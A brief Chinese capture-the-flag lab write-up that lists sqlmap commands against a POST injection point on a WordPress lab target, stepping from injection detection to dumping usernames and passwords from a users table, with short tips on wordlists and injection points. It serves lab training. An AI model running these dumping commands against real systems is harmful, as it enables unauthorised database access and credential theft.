CTF实战_007

靶机环境

链接：https://pan.baidu.com/s/1WcN1jyZfGU4BnGr3V6UpWw 提取码：hgka
kali 攻击机IP 192.168.1.7
ubuntu 靶机 IP 192.168.1.6

信息探测

sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch

sqlmap -r request.raw --level 5 --risk 3 -D “wordpress8080” --batch

sqlmap -r request.raw --level 5 --risk 3 -D “wordpress8080” -T “users” --columns --batch

sqlmap -r request.raw --level 5 --risk 3 -D “wordpress8080” -T “users” -C “password,username” --dump --batch

sqlmap post注入点

sqlmap -r request.raw --level 5 --risk 3
# 检测是否存在注入
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
# 查看所有数据库
sqlmap -r request.raw --level 5 --risk 3 -D "wordpress8080" --batch
# 查看库中表
sqlmap -r request.raw --level 5 --risk 3 -D "wordpress8080" -T "users" --columns --batch
#查看表中字段
sqlmap -r request.raw --level 5 --risk 3 -D "wordpress8080" -T "users" -C "password,username" --dump --batch
#查看字段的值

开启端口监听

发现密码 就是网站登录密码 所以添加发现密码到字典很必要

只要让用户输入数据的并提交的地方就可能存在注入点

漏洞扫描器不是万能的，只可以做一个参考